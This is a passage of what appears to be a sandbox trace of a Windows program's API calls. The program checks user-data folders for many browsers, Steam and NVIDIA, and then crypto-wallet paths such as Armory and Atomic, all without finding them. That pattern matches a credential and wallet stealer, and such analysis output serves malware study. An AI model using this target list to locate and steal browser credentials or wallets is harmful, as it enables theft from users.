lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.813] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.813] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x40 [0281.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.813] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0281.814] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.815] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.816] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data") returned 0x32 [0281.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.816] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x31 [0281.816] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.818] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.818] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x3e [0281.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.818] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x3d [0281.818] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.819] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.819] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data") returned 0x34 [0281.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.820] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x33 [0281.820] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.821] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.822] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data") returned 0x33 [0281.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.822] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x32 [0281.822] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.823] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.823] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3b [0281.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.823] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3a [0281.824] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.826] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.826] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data") returned 0x34 [0281.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.827] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x33 [0281.827] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.828] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.828] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3a [0281.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.829] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x39 [0281.829] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.830] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.830] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data") returned 0x30 [0281.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.831] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x2f [0281.831] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.832] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.832] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data") returned 0x34 [0281.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.833] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x33 [0281.833] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.834] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.834] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x38 [0281.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.835] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x37 [0281.835] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.837] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.837] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x47 [0281.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.838] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x46 [0281.838] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.840] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.840] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3a [0281.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.841] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x39 [0281.841] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.843] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.844] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x4e [0281.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.844] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x4d [0281.844] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.846] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.847] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam") returned 0x27 [0281.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.847] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x26 [0281.847] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.849] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.849] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x3d [0281.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.850] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3c [0281.850] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.893] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.893] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Armory", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory") returned 0x2a [0281.893] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x29 [0281.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.894] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x29 [0281.894] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory\\*.wallet", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.897] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.897] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\atomic", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic") returned 0x2a [0281.897] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x29 [0281.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.897] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x29 [0281.897] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, 